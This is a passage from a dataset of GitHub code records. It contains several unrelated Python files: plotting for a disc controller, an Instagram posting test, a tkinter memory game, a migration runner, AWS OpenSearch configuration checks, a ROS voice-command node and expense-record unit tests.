label='max')\nplt.plot(np.arange(nr_sim_steps)*dt, np.ones(nr_sim_steps)*q_min[0], 'r-.')#, label='min')\n# plt.xlabel(\"time [s]\")\nplt.ylabel(\"angle [rad]\")\nplt.grid()\nplt.legend(loc='upper right')\n\nplt.show()\n\nCT_iters = np.split(log_comp_t, nr_sim_steps, axis=1)\nCT = np.sum(CT_iters[0], axis=1)\n\nremove_start = 0\nS_iter = np.zeros(nr_sim_steps-remove_start)\nT_iter = np.zeros(nr_sim_steps-remove_start)\n\nfor i in range(remove_start,nr_sim_steps):\n CT = np.sum(CT_iters[i], axis=1)\n S_iter[i-remove_start] = CT[1]\n T_iter[i-remove_start] = np.sum(CT)\n\nSorted = np.sort(T_iter)\n# np.max(T_iter)*1000, np.mean(Sorted[int(nr_sim_steps*0.95):])*1000, np.mean(T_iter)*1000, np.std(T_iter)*1000, np.mean(S_iter)*1000 #in ms\nTimes = [np.max(T_iter)*1000, np.mean(T_iter)*1000, np.std(T_iter)*1000, np.mean(S_iter)*1000] #in ms\nprint(Times)\n\n# np.save(\"experiments/ud_nmpc_encoder_levels_u.npy\", log_w)\n# np.save(\"experiments/ud_nmpc_encoder_levels_q.npy\", log_q)\n\nnp.save(\"experiments/ud_nmpc_encoder_sinus_u.npy\", log_w)\nnp.save(\"experiments/ud_nmpc_encoder_sinus_q.npy\", log_q)","repo_name":"Mixxxxx358/NonlinearController","sub_path":"encoder_NMPC_UnbalancedDisc.py","file_name":"encoder_NMPC_UnbalancedDisc.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26954463957","text":"import os\n\nfrom datetime import datetime, timedelta\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\nfrom instabot.post import Post\nfrom instabot.poster import Poster\n\ndef test_integration_post_multiple_times():\n # Given.\n poster = Poster(username=os.getenv('TEST_INSTAGRAM_USERNAME'), password=os.getenv('TEST_INSTAGRAM_PASSWORD'), account_name=os.getenv('TEST_INSTAGRAM_ACCOUNT_NAME'))\n post1 = Post(filepath=os.getcwd() + '/tests/img/valid_test_img.png', description=\"This is a test description.\", scheduled_time=datetime.now() + timedelta(days=1))\n post2 = Post(filepath=os.getcwd() + '/tests/img/valid_test_img.png', description=\"This is a test description.\", scheduled_time=datetime.now() + timedelta(days=2))\n\n # When.\n url1 = poster.post(post1)\n url2 = poster.post(post2)\n\n # Then.\n poster._driver.get(url1)\n sleep(2)\n post_description1 = poster._driver.find_element(By.XPATH, f\"//h1[contains(text(), '{post1.description}')]\").text\n post_image_information1 = poster._driver.find_element(By.XPATH, f\"//img[contains(@alt, '{datetime.now().strftime('%b %d, %Y')}')]\").get_attribute(\"alt\")\n \n poster._driver.get(url2)\n sleep(2)\n post_description2 = poster._driver.find_element(By.XPATH, f\"//h1[contains(text(), '{post1.description}')]\").text\n post_image_information2 = poster._driver.find_element(By.XPATH, f\"//img[contains(@alt, '{datetime.now().strftime('%b %d, %Y')}')]\").get_attribute(\"alt\")\n\n poster._delete_post(url1)\n poster._delete_post(url2)\n poster._driver.quit()\n\n assert post_description1 == post1.description\n assert post_image_information1 == f\"Photo by {poster._account_name} on {datetime.now().strftime('%b %d, %Y')}.\"\n assert post_description2 == post2.description\n assert post_image_information2 == f\"Photo by {poster._account_name} on {datetime.now().strftime('%b %d, %Y')}.\"","repo_name":"Ssoppa/InstaBot","sub_path":"tests/integration/test_integration_poster.py","file_name":"test_integration_poster.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39314373737","text":"\nimport random\nimport time\nfrom tkinter import Tk , Button , DISABLED\n\n\ndef show_symbol(x,y):\n global first\n global previousx , previousy\n buttons[x,y]['text'] = button_symbols[x,y]\n buttons[x,y].update_idletasks()\n\n if first:\n previousx = x\n previousy = y\n first = False\n \n elif previousx != x or previousy != y:\n if buttons[previousx,previousy]['text'] != buttons[x,y]['text']:\n time.sleep(1.1)\n buttons[previousx,previousy]['text'] = ' '\n buttons[x,y]['text'] = ' '\n else:\n buttons[previousx,previousy]['command'] = DISABLED\n buttons[x,y]['command'] = DISABLED\n first = True\n\nwin = Tk()\nwin.title('Match the numbers')\nwin.resizable(width=False , height=False)\nfirst = True\npreviousx = 0\npreviousy = 0\nbuttons = { }\nbutton_symbols = { }\nsymbols = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\"]\n\nrandom.shuffle(symbols)\n\nfor x in range(6):\n for y in range(4):\n button = Button(command = lambda x=x , y=y: show_symbol(x,y) , width = 8, height = 5, activebackground = 'white', fg = 'red', font = 'helv36' , justify = 'center', activeforeground = 'black', bg = 'lightblue', bd = 4)\n button.grid(column = x , row = y)\n buttons[x,y] = button\n button_symbols[x,y] = symbols.pop()\n\nwin.mainloop()\n#Hastis's emoji match maker","repo_name":"HastiSutaria/match_the_numbers","sub_path":"match_numbers.py","file_name":"match_numbers.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2684442077","text":"import datetime\nimport json\nimport logging\nimport os\nfrom importlib import util\nimport pytz\n\n\nlogging.basicConfig(\n format='[%(asctime)s] (%(levelname)s) %(name)s: %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.DEBUG)\n\n_logger = logging.getLogger(\"Migrator\")\n\n\ndef now():\n \"\"\"\n Returns UTC timestamp with time zone\n \"\"\"\n return pytz.UTC.localize(datetime.datetime.utcnow())\n\n\ndef now_br():\n \"\"\"\n Returns America - São Paulo timestamp with time zone\n \"\"\"\n return now().astimezone(pytz.timezone(\"America/Sao_Paulo\"))\n\n\ndef write_json(data, file_path):\n \"\"\"\n Write data to json.\n :data: json structured data\n :file_path: file path string description\n \"\"\"\n with open(file_path, 'w') as file:\n json.dump(data, file, indent=4)\n\n\ndef migrate(environment=os.getenv('ENVIRONMENT')):\n \"\"\"\n If migrations at migrations folder not applied, apply them.\n \"\"\"\n\n # Paths\n DIR_PATH = os.path.dirname(__file__)\n MIGRATIONS_PATH = os.path.join(DIR_PATH, 'migrations')\n MIGRATIONS_EXECUTION_PATH = os.path.join(\n DIR_PATH, 'migrations', 'migrations_execution.json')\n\n # Verify already applied migrations\n with open(MIGRATIONS_EXECUTION_PATH) as json_file:\n data = json.load(json_file)\n\n temp = data['executed']\n\n migrated_list = (\n [migration_done.get(\"name\", None)for migration_done in temp\n if environment in migration_done.get(\"environment\", None)]\n )\n\n # Look for migrations at migrations folder\n migrations = sorted(\n filter(\n lambda file_name: file_name.endswith('.py'),\n os.listdir(MIGRATIONS_PATH)\n )\n )\n\n # Apply migrations found\n for migration in migrations:\n\n # If migration already applied skip\n if migration in migrated_list:\n _logger.warning('Migration %s already applied', migration)\n continue\n\n # Import migration\n migration_path = os.path.join(\n os.path.dirname(__file__), 'migrations', migration)\n spec = util.spec_from_file_location(migration, migration_path)\n migration_import = util.module_from_spec(spec)\n spec.loader.exec_module(migration_import)\n\n # Apply migrations\n try:\n migration_import.apply()\n _logger.info('migration %s executed', migration)\n\n migrated = {\n \"name\": migration,\n \"date\": str(now_br()),\n \"environment\": environment\n }\n\n temp.append(migrated)\n\n except Exception as error:\n _logger.error('migration failed. Error: %s', error)\n\n if environment != 'testing':\n write_json(data, MIGRATIONS_EXECUTION_PATH)\n\n\nif __name__ == '__main__':\n migrate()\n","repo_name":"dmenezesgabriel/tick_track","sub_path":"tick_track/database/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10380104202","text":"import torch\nimport random\nfrom tqdm import tqdm\n\ntrain = torch.load('data/mnist/MNIST/processed/training.pt')\n\nN = 60000\n\nm = [[] for _ in range(N)]\nm1 = []\n\nfor i in tqdm(range(100)):\n for _ in range(N):\n a = random.randint(0, 59999)\n m[a].append(i)\n\n\nfor i in range(N):\n b = ','.join([str(x) for x in m[i]])\n m1.append(b)\n\nd = (train[0], train[1], m1)\n\ntorch.save(d, 'training_rf.pt')\n","repo_name":"walker1001/Thesis","sub_path":"create_bagging.py","file_name":"create_bagging.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74936307477","text":"import os\nimport pandas as pd\nfrom pathlib import Path\nimport csv\nimport datetime\nfrom datetime import date\n\nos.chdir(str(Path.home()))\n# user input for where images are stored. 'copy path' from file explorer\nproject_directory = 'Documents/Beetle ID Trial'\n# Change working directory.\nos.chdir(project_directory)\n\ndirectory = str('fingerprints')\n\nimages_list = os.listdir(directory) # List and print all files in directory.\n\n# read in simulated context for each image\nfocal_df = pd.read_csv('data/simulated_wild_data.csv')\nquery_df = pd.read_csv('data/simulated_wild_released_data.csv')\n\nsize_offset = float(0.05) # variable defining how much uncertainty in individual size i will accept for comparisons.\n\nn = 35\n\ndef get_list_focal_examples(images_list):\n # initialize list to accept photo examples of focal individual\n list_focal_examples = []\n list_focal = focal_df.iloc[:, 0] # split off first column of within-week beetle names as list\n\n # for every unique within-week name, find all photo examples of that individual.\n for i in range(0,len(list_focal)):\n matching = [s for s in images_list if s.split(\"_\")[0] == list_focal[i].split(\"_\")[0] and s.split(\"_\")[1] == list_focal[i].split(\"_\")[1]]\n list_focal_examples.append(matching)\n\n return list_focal, list_focal_examples\n\ndef get_list_test(focal_df, query_df, size_offset):\n list_test = []\n # for every focal individual, find all potential pairwise-comparisons that make sense with respect to\n # body size, date of capture/photo and sex\n for i in range(0,len(focal_df)):\n refined = query_df[((query_df[\"size\"].between(focal_df.at[i, \"size\"] - size_offset,\n focal_df.at[i, \"size\"] + size_offset)) | (\n query_df[\"size\"].isnull())) &\n ((query_df[\"datef\"] < focal_df.at[i, \"datef\"])) &\n ((query_df[\"sex\"] == focal_df.at[i, \"sex\"]) | (query_df[\"sex\"].isnull())) &\n (query_df[\"focal\"] != focal_df.at[i, \"focal\"])]\n # insert extra filter when data is further refined. Amend date filtering on real data to < than, rather than <=.\n #df[\"sex\"] == df.at[i,\"sex\"]\n list_test.append(refined.iloc[:, 0])\n\n return list_test\n\ndef get_list_test_examples(list_test, images_list):\n list_test_examples = []\n # for every unique within-week name of potential matches to focal, find all photo examples of those individuals.\n for sublist in list_test:\n sublist = sublist.tolist()\n temp = []\n for i in sublist:\n matching = [s for s in images_list if str(i) in s]\n temp.append(matching)\n flat_list = [item for sublist in temp for item in sublist]\n list_test_examples.append(flat_list)\n\n for i in range(len(list_test_examples)):\n if not list_test_examples[i]:\n list_test_examples[i] = [\"No matching\"]\n\n return list_test_examples\n\ndef generate_lists(images_list, focal_df, query_df, size_offset):\n list_focal, list_focal_examples = get_list_focal_examples(images_list)\n list_test = get_list_test(focal_df, query_df, size_offset)\n list_test_examples = get_list_test_examples(list_test, images_list)\n\n return list_focal_examples, list_test_examples\n\ndef product_of_matches(nested_list_1, nested_list_2, i):\n for item_1 in nested_list_1[i]:\n for item_2 in nested_list_2[i]:\n pairs.append([item_1, item_2])\n return\n\nstart_time = datetime.datetime.now()\nlist_focal_examples, list_test_examples = generate_lists(images_list, focal_df, query_df, size_offset)\n\npairs = [['focal_image', 'test_image']]\nfor i in range(len(list_focal_examples)):\n product_of_matches(list_focal_examples, list_test_examples, i)\n\nwith open('data/wild_pairwise_list.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(pairs)\n\nprocessing_time = datetime.datetime.now() - start_time\n# print the time taken to process all images\nprint(\"Time taken: \", processing_time)\n\nwith open('logs/processing_times.txt', 'a') as f:\n f.write('\\n Generating pairwise comparisons - {0} matches processed in {1} minutes. {2} \\n'.format(\n str(len(pairs) - 1), str(processing_time), date.today()))","repo_name":"KynanDelaney/Beetle_ID","sub_path":"Backend/generating_pairwise_lists.py","file_name":"generating_pairwise_lists.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"75109349398","text":"import time\nimport datetime\n\nfrom utils.Config import Config\nfrom utils.Tools import _pr\nfrom utils.Tools import _warn\nfrom utils.Tools import aws_parseInstanceFamily\nfrom utils.Policy import Policy\nfrom services.Evaluator import Evaluator\n\nclass OpensearchCommon(Evaluator):\n NODES_LIMIT = 200\n \n def __init__(self, bConfig, domain, osClient, cwClient):\n self.results = {}\n self.clientConfig = bConfig\n self.domain = domain\n self.osClient = osClient\n self.cwClient = cwClient\n \n self.attribute = self.osClient.describe_domain(DomainName=self.domain)\n self.cluster_config = self.attribute[\"DomainStatus\"][\"ClusterConfig\"]\n self.domain_config = self.osClient.describe_domain_config(DomainName=self.domain)\n\n self.aos_versions = self.osClient.list_versions(MaxResults=11)\n self.latest_version = self.aos_versions[\"Versions\"][0]\n self.engine_version = self.attribute[\"DomainStatus\"][\"EngineVersion\"]\n self.instance_type_details = self.osClient.list_instance_type_details(\n EngineVersion=self.engine_version\n )\n \n # Create a list of OpenSearch instance types.\n self.instance_type_list = []\n for idx, details in enumerate(self.instance_type_details[\"InstanceTypeDetails\"]):\n self.instance_type_list.append(details[\"InstanceType\"])\n \n # Initialize the evaluator.\n self.init()\n \n def getCloudWatchData(self, metric, statistics=[\"Average\"], time_ago=300, period=300):\n cw_client = self.cwClient\n \n sts_info = Config.get(\"stsInfo\")\n client_id = sts_info[\"Account\"]\n\n dimensions = [\n {\"Name\": \"ClientId\", \"Value\": client_id},\n {\"Name\": \"DomainName\", \"Value\": self.domain},\n ]\n\n stats = cw_client.get_metric_statistics(\n Dimensions=dimensions,\n Namespace=\"AWS/ES\",\n MetricName=metric,\n StartTime=int(time.time())-time_ago,\n EndTime=int(time.time()),\n Period=period,\n Statistics=statistics\n )\n\n return stats \n \n def _checkMasterNodes(self):\n enabled = self.cluster_config[\"DedicatedMasterEnabled\"]\n if enabled:\n nodes = self.cluster_config[\"DedicatedMasterCount\"]\n self.results[\"DedicatedMasterNodes\"] = [-1, \"No dedicated master nodes\"]\n \n if nodes < 3:\n self.results[\"DedicatedMasterNodes\"] = [-1, \"Insufficient dedicated master nodes\"]\n return\n if nodes % 2 == 0:\n self.results[\"DedicatedMasterNodes\"] = [-1, \"Wrong number of dedicated master nodes\"]\n return\n self.results[\"DedicatedMasterNodes\"] = [1, \"Sufficient dedicated master nodes\"]\n \n def _checkAvailabilityZones(self):\n enabled = self.cluster_config[\"ZoneAwarenessEnabled\"]\n self.results[\"AvailabilityZones\"] = [-1, \"Multi-AZ not enabled\"]\n if enabled:\n self.results[\"AvailabilityZones\"] = [1, \"Multi-AZ enabled\"]\n\n def _checkServiceSoftwareVersion(self):\n if 'DomainStatus' in self.attribute:\n if 'ServiceSoftwareOptions' in self.attribute['DomainStatus']:\n if 'UpdateAvailable' in self.attribute['DomainStatus']['ServiceSoftwareOptions']:\n self.results[\"ServiceSoftwareVersion\"] = [-1, \"Upgrade to latest version\"]\n\n def _checkEngineVersion(self):\n if self.engine_version != self.latest_version:\n self.results[\"EngineVersion\"] = [-1, \"Later Engine Versions Available\"]\n\n def _checkFineGrainedAccessControl(self):\n self.results[\"FineGrainedAccessControl\"] = [-1, \"Not enabled\"]\n \n if 'DomainStatus' in self.attribute:\n if 'AdvancedSecurityOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['AdvancedSecurityOptions']:\n self.results[\"FineGrainedAccessControl\"] = [1, \"Enabled\"]\n\n def _checkDomainWithinVpc(self):\n self.results[\"DomainWithinVPC\"] = [-1, \"Public\"]\n if \"DomainStatus\" in self.attribute:\n if \"VPCOptions\" in self.attribute[\"DomainStatus\"]:\n self.results[\"DomainWithinVPC\"] = [1, \"Private\"]\n\n def _checkInstanceVersion(self):\n instance_type = self.cluster_config[\"InstanceType\"]\n self.results[\"LatestInstanceVersion\"] = [1, instance_type]\n\n instance_info = aws_parseInstanceFamily(instance_type)\n\n instance_prefix_arr = instance_info[\"prefixDetail\"]\n instance_prefix_arr[\"version\"] = int(instance_prefix_arr[\"version\"]) + 1\n size = instance_info[\"suffix\"]\n latest_instance = (\n instance_prefix_arr[\"family\"]\n + str(instance_prefix_arr[\"version\"])\n + instance_prefix_arr[\"attributes\"]\n + size\n + \".search\"\n )\n\n if latest_instance in self.instance_type_list:\n self.results[\"LatestInstanceVersion\"] = [-1, instance_type]\n \n def _checkTSeriesForProduction(self):\n instance_type = self.cluster_config[\"InstanceType\"]\n type_arr = instance_type.split(\".\")\n family = type_arr[0]\n family_char = list(family)\n if family_char[0] == \"t\":\n self.results[\"TSeriesForProduction\"] = [-1, instance_type]\n\n def _checkEncryptionAtRest(self):\n self.results[\"EncyptionAtRest\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'EncryptionAtRestOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['EncryptionAtRestOptions']:\n self.results[\"EncyptionAtRest\"] = [1, \"Enabled\"]\n\n def _checkNodeToNodeEncryption(self):\n self.results[\"NodeToNodeEncryption\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'NodeToNodeEncryptionOptions' in self.attribute['DomainStatus']:\n if 'Enabled' in self.attribute['DomainStatus']['NodeToNodeEncryptionOptions']:\n self.results[\"NodeToNodeEncryption\"] = [1, \"Enabled\"]\n \n def _checkSearchSlowLogs(self):\n self.results[\"SearchSlowLogs\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'LogPublishingOptions' in self.attribute['DomainStatus']:\n if 'SEARCH_SLOW_LOGS' in self.attribute['DomainStatus']['LogPublishingOptions']:\n self.results[\"SearchSlowLogs\"] = [1, \"Enabled\"]\n\n def _checkAutoTune(self):\n self.results[\"AutoTune\"] = [-1, \"Disabled\"]\n if 'DomainStatus' in self.attribute:\n if 'AutoTuneOptions' in self.attribute['DomainStatus']:\n if 'State' in self.attribute['DomainStatus']['AutoTuneOptions']:\n if self.attribute[\"DomainStatus\"][\"AutoTuneOptions\"][\"State\"] == \"ENABLED\":\n self.results[\"AutoTune\"] = [1, \"Enabled\"]\n\n def _checkUltrawarmEnabled(self):\n self.results[\"UltrawarmEnabled\"] = [-1, \"Disabled\"]\n if self.cluster_config[\"WarmEnabled\"]:\n self.results[\"UltrawarmEnabled\"] = [1, \"Enabled\"]\n\n def _checkColdStorage(self):\n self.results[\"ColdStorage\"] = [-1, \"Disabled\"]\n if self.cluster_config[\"ColdStorageOptions\"]:\n self.results[\"ColdStorage\"] = [1, \"Enabled\"]\n \n def _checkEbsStorageUtilisation(self):\n metric = \"FreeStorageSpace\"\n stats = self.getCloudWatchData(metric)\n\n dp = stats.get(\"Datapoints\")\n free_space = dp[0][\"Average\"]\n\n try:\n ebs_vol_size = self.domain_config[\"DomainConfig\"][\"EBSOptions\"][\"Options\"][\n \"VolumeSize\"\n ]\n except Exception as e:\n # print(\"Not EBSEnabled\")\n self.results[\"EBSStorageUtilisation\"] = [-1, \"Not EBSEnabled\"]\n return\n\n if free_space < 0.25 * (ebs_vol_size * 1000):\n self.results[\"EBSStorageUtilisation\"] = [\n -1,\n f\"{free_space} out of {ebs_vol_size * 1000} remaining\",\n ]\n return\n \n def _checkClusterStatus(self):\n metrics = [\"ClusterStatus.red\", \"ClusterStatus.yellow\", \"ClusterStatus.green\"]\n\n for metric in metrics:\n stats = self.getCloudWatchData(metric)\n dp = stats.get(\"Datapoints\")\n if dp and metric == \"ClusterStatus.green\":\n self.results[\"ClusterStatus\"] = [1, metric]\n elif dp:\n self.results[\"ClusterStatus\"] = [-1, metric]\n\n def _checkReplicaShard(self):\n self.results[\"ReplicaShard\"] = [-1, None]\n\n active = \"Shards.active\"\n primary = \"Shards.activePrimary\"\n\n stats_active = self.getCloudWatchData(active)\n dp_active = stats_active.get(\"Datapoints\")[0][\"Average\"]\n\n stats_primary = self.getCloudWatchData(primary)\n dp_primary = stats_primary.get(\"Datapoints\")[0][\"Average\"]\n\n if dp_active - dp_primary:\n self.results[\"ReplicaShard\"] = [1, \"Enabled\"]\n \n def __checkMasterNodeType(self):\n xmap = [\n {\n \"instance_count\": {\"min\": 1, \"max\": 10},\n \"type\": {\"min_vcpu\": 8, \"min_memoryInGiB\": 16},\n },\n {\n \"instance_count\": {\"min\": 11, \"max\": 30},\n \"type\": {\"min_vcpu\": 2, \"min_memoryInGiB\": 8},\n },\n {\n \"instance_count\": {\"min\": 31, \"max\": 75},\n \"type\": {\"min_vcpu\": 16, \"min_memoryInGiB\": 32},\n },\n {\n \"instance_count\": {\"min\": 76, \"max\": 125},\n \"type\": {\"min_vcpu\": 8, \"min_memoryInGiB\": 64},\n },\n {\n \"instance_count\": {\"min\": 126, \"max\": 200},\n \"type\": {\"min_vcpu\": 16, \"min_memoryInGiB\": 128},\n },\n ]\n\n instance_type = self.cluster_config[\"DedicatedMasterType\"]\n instance_info = aws_parseInstanceFamily(instance_type)\n\n nodes = self.cluster_config[\"InstanceCount\"]\n\n if nodes < 0 or nodes > self.NODES_LIMIT:\n print(_warn(f\"{nodes} not within the range of 0 & {self.NODES_LIMIT}\"))\n\n for row in xmap:\n if row[\"instance_count\"][\"min\"] <= nodes <= row[\"instance_count\"][\"max\"]:\n # Get instance attributes\n cpu = instance_info[\"specification\"][\"vcpu\"]\n memory = instance_info[\"specification\"][\"memoryInGiB\"]\n if not (\n row[\"type\"][\"min_vcpu\"] <= cpu\n and row[\"type\"][\"min_memoryInGiB\"] <= memory\n ):\n self.results[\"MasterNodeType\"] = [-1, instance_type]","repo_name":"aws-samples/service-screener-v2","sub_path":"services/opensearch/drivers/OpensearchCommon.py","file_name":"OpensearchCommon.py","file_ext":"py","file_size_in_byte":10788,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"85"} +{"seq_id":"19624273225","text":"#!/usr/bin/env python\nimport rospy\nfrom jsk_gui_msgs.msg import VoiceMessage\nimport numpy as np \nfrom std_msgs.msg import String\n\ndef voice_callback(data):\n sep = data.texts[0].split(' ')\n # print yolo_obj\n # print 'sep = ', sep\n\n if 'come' and 'to' and ('me' or 'Me') in sep:\n # voice_pub.publish('me')\n rospy.set_param('find_obj', 'person')\n elif 'grab' in sep:\n check_yolo = False\n for i in sep:\n # print i\n if i in yolo_obj:\n rospy.set_param('find_obj', i) # grab a cup\n check_yolo = True\n break\n if check_yolo == False:\n rospy.set_param('find_obj', 'nothing')\n\n \n else:\n rospy.set_param('find_obj', 'nothing')\n\n return\n\nif __name__ == '__main__':\n yolo_obj = ['person','bicycle','car','motorbike','aeroplane','bus','train','truck','boat','traffic light','fire hydrant','stop sign','parking meter','bench','bird','cat','dog','horse','sheep','cow','elephant','bear','zebra','giraffe','backpack','umbrella','handbag','tie','suitcase','frisbee','skis','snowboard','sports ball','kite','baseball bat','baseball glove','skateboard','surfboard','tennis racket','bottle','wine glass','cup','fork','knife','spoon','bowl','banana','apple','sandwich','orange','broccoli','carrot','hot dog','pizza','donut','cake','chair','sofa','pottedplant','bed','diningtable','toilet','tvmonitor','laptop','mouse','remote','keyboard','cell phone','microwave','oven','toaster','sink','refrigerator','book','clock','vase','scissors','teddy bear','hair drier','toothbrush']\n rospy.init_node('voice_reg', anonymous=True)\n rospy.loginfo('voice_reg initialization')\n # voice_pub = rospy.Publisher('/robot_project/voice_command', String, queue_size=10)\n rospy.Subscriber('/Tablet/voice', VoiceMessage, voice_callback)\n rospy.spin()","repo_name":"r06921017/RobotProject2018","sub_path":"voice_reg.py","file_name":"voice_reg.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"43149412582","text":"import io\nfrom unittest.mock import patch\nfrom readRecord import ReadRecordPage, ReadRecordOption\nfrom mock_db import MockDB\nfrom accessor import ExecutionStatus as es\nfrom freezegun import freeze_time\n\nclass TestReadRecord(MockDB):\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n def test_show(self, _stdout):\n ReadRecordPage.show()\n output_lines = _stdout.getvalue().strip().split(\"\\n\")\n self.assertEqual(output_lines[0], \"%d: 查看本日紀錄\" % ReadRecordOption.TODAY)\n self.assertEqual(output_lines[1], \"%d: 查看本週紀錄\" % ReadRecordOption.WEEK)\n self.assertEqual(output_lines[2], \"%d: 查看本月紀錄\" % ReadRecordOption.MONTH)\n self.assertEqual(output_lines[3], \"%d: 查看指定時間紀錄\" % ReadRecordOption.OTHER)\n self.assertEqual(output_lines[4], \"%d: 回到上一頁\" % ReadRecordOption.BACK)\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n def test_hints(self, _stdout):\n hints = [(ReadRecordPage.hintGetStartDate, \"請輸入 開始 時間(yyyy-mm-dd):\\n\"),\n (ReadRecordPage.hintGetEndDate, \"請輸入 結束 時間(yyyy-mm-dd):\\n\")]\n for hint in hints:\n hint[0]()\n self.assertMultiLineEqual(_stdout.getvalue(), hint[1])\n _stdout.truncate(0)\n _stdout.seek(0)\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @patch(\"builtins.input\", side_effect=[\"0\", \"6\", \"F\", \"1\", \"2\", \"3\", \"4\", \"5\"])\n def test_choose(self, _input, _stdout):\n self.assertEqual(ReadRecordPage.choose(), 1)\n self.assertEqual(_input.call_count, 4)\n self.assertEqual(ReadRecordPage.choose(), 2)\n self.assertEqual(_input.call_count, 5)\n self.assertEqual(ReadRecordPage.choose(), 3)\n self.assertEqual(_input.call_count, 6)\n self.assertEqual(ReadRecordPage.choose(), 4)\n self.assertEqual(_input.call_count, 7)\n self.assertEqual(ReadRecordPage.choose(), 5)\n self.assertEqual(_input.call_count, 8)\n self.assertEqual(_stdout.getvalue(), \"請輸入 1 到 5 之間的數字:\\n\" * 3)\n\n @patch.object(ReadRecordPage, \"viewToday\")\n @patch.object(ReadRecordPage, \"viewWeek\")\n @patch.object(ReadRecordPage, \"viewMonth\")\n @patch.object(ReadRecordPage, \"viewOther\")\n def test_execute(self, _viewOther, _viewMonth, _viewWeek, _viewToday):\n ReadRecordPage.execute(ReadRecordOption.OTHER)\n self.assertEqual(_viewOther.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.MONTH)\n self.assertEqual(_viewMonth.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.WEEK)\n self.assertEqual(_viewWeek.call_count, 1)\n ReadRecordPage.execute(ReadRecordOption.TODAY)\n self.assertEqual(_viewToday.call_count, 1)\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewToday(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewToday()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 1)\n self.assertEqual(output_lines[0], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewWeek(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewWeek()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 2)\n self.assertEqual(output_lines[0], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[1], \"4 EXPENSE 類別: 飲料 金額: 100.0 帳戶: Line Pay 地點: 飲料店 消費時間: 2023-05-19 扣款時間: 2023-05-19 發票號碼: 備註: 麻古-芝芝芒果\")\n \n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @freeze_time(\"2023-05-18\")\n def test_viewMonth(self, _stdout):\n with self.mock_db_config:\n ReadRecordPage.setUp_connection_and_table()\n ReadRecordPage.viewMonth()\n ReadRecordPage.tearDown_connection(es.NONE)\n output_lines = _stdout.getvalue().strip().split('\\n')\n self.assertEqual(len(output_lines), 4)\n self.assertEqual(output_lines[0], \"1 EXPENSE 類別: 食物 金額: 50.0 帳戶: 現金 地點: 便利商店 消費時間: 2023-05-01 扣款時間: 2023-05-01 發票號碼: 12345678 備註: milk\")\n self.assertEqual(output_lines[1], \"2 EXPENSE 類別: 住宿 金額: 2500.0 帳戶: Line Pay 地點: 其它 消費時間: 2023-05-18 扣款時間: 2023-05-18 發票號碼: 備註: taipei\")\n self.assertEqual(output_lines[2], \"3 INCOME 類別: 其它 金額: 10000.0 帳戶: 中華郵政 地點: 其它 消費時間: 2023-05-22 扣款時間: 2023-05-23 發票號碼: 19970901 備註: \")\n self.assertEqual(output_lines[3], \"4 EXPENSE 類別: 飲料 金額: 100.0 帳戶: Line Pay 地點: 飲料店 消費時間: 2023-05-19 扣款時間: 2023-05-19 發票號碼: 備註: 麻古-芝芝芒果\")\n\n\n @patch(\"sys.stdout\", new_callable=io.StringIO)\n @patch.object(ReadRecordPage, \"hintGetEndDate\")\n @patch.object(ReadRecordPage, \"hintGetStartDate\")\n @patch(\"builtins.input\", side_effect=[\"2023-05-01\", \"2023-05-18\", \"2023-0123\", \"\", \"22A8\", \"\"])\n @freeze_time(\"2023-05-18\")\n def 